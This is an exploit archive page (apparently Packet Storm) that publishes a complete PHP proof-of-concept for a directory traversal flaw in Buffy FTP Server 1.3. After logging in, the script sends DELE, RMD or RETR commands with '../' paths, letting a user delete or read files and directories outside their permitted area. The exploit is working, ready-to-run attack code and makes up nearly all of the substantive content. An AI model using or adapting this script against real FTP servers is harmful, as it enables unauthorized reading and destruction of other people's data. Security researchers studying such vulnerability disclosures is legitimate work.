exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Buffy 1.3 Directory Traversal

Buffy 1.3 Directory Traversal
Posted Nov 1, 2010
Authored by Pr0T3cT10n

Buffy version 1.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | ff66056a17dbe1478d2636170c5b47f6988c0530d10ae1b463db4320181ac06b

Buffy 1.3 Directory Traversal

Change Mirror Download
<?php
# _ ____ __ __ ___
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# The following is a proof of concept for a path traversal vulnerability that exists in Buffy FTP Server.
# The vulnerability allows an unprivileged attacker to read files and delete files & folders whom he has no permissions to.
# The vulnerable FTP commands are:
# * RETR - Read File
# * RMD - Remove Directory
# * DELE - Delete File
#-----------------------------------
# Exploit Title: Buffy v1.3 Remote Directory Traversal Exploit
# Date: 31/10/2010
# Author: Pr0T3cT10n
# Software Link: http://www.smotricz.com/opensource/buffy/Buffy.zip
# Affected Version: 1.3
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL

error_reporting(E_ALL);
if(count($argv) <= 4) {
echo("\r\n# Usage: {$argv[0]} [HOST] [PORT] [USER] [PASS]\r\n");
echo("\tHOST - An host using Buffy FTP Server\r\n");
echo("\tPORT - Default is 21\r\n");
echo("\tUSER - Username\r\n");
echo("\tPASS - Password\r\n");
exit("\r\n");
} else {
$CMD = '';
$CFG = Array('file' => $argv[0], 'host' => $argv[1], 'port' => $argv[2], 'user' => $argv[3], 'pass' => $argv[4]);
$sock = fsockopen($CFG['host'], $CFG['port'], $errno, $errstr, 5);
if($sock) {
echo("(+) Connected to the FTP server at '{$CFG['host']}' on port {$CFG['port']}\r\n");
$read = fread($sock, 1024);
fwrite($sock, "USER {$CFG['user']}\r\n");
$read = fread($sock, 1024);
fwrite($sock, "PASS {$CFG['pass']}\r\n");
$read = fread($sock, 1024);
echo("(~) What would you like to do?\r\n\t1.Remove File\r\n\t2.Remove Directory\r\n\t3.Read File\r\n");
$CHSE = rtrim(fgets(STDIN));
if($CHSE == 1) {
$CMD.= "DELE";
echo("(~) Path to file(for example: ../../../test.txt): ");
$PATH = rtrim(fgets(STDIN));
if($PATH != '') {
fwrite($sock, "{$CMD} {$PATH}\r\n");
echo(fread($sock, 1024));
} else {
exit("(-) Empty path.\r\n");
}
} elseif($CHSE == 2) {
$CMD.= "RMD";
echo("(~) Path to directory(for example: ../../../test): ");
$PATH = rtrim(fgets(STDIN));
if($PATH != '') {
fwrite($sock, "{$CMD} {$PATH}\r\n");
echo(fread($sock, 1024));
} else {
exit("(-) Empty path.\r\n");
}
} elseif($CHSE == 3) {
$CMD.= "RETR";
echo("(~) Path to file(for example: ../../../test.txt): ");
$PATH = rtrim(fgets(STDIN));
if($PATH != '') {
fwrite($sock, "PASV\r\n");
$read = fread($sock, 1024);
$xpld = explode(',', $read);
$addr_tmp = explode('(', $xpld[0]);
$address = "{$addr_tmp[1]}.{$xpld[1]}.{$xpld[2]}.{$xpld[3]}";
$port_tmp = explode(')', $xpld[5]);
$newport = ($xpld[4]*256)+$port_tmp[0];
fwrite($sock, "{$CMD} {$PATH}\r\n");
$read = fread($sock, 1024);
$socket = fsockopen($address, $newport, $errno, $errstr, 5);
if($socket) {
echo(fread($socket, 1024));
}
} else {
exit("(-) Empty path.\r\n");
}
} else {
exit("(-) You have to choose correctly.\r\n");
}
} else {
exit("(-) Unable to connect to {$CFG['host']}:{$CFG['port']}\r\n");
}
}
?>

Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close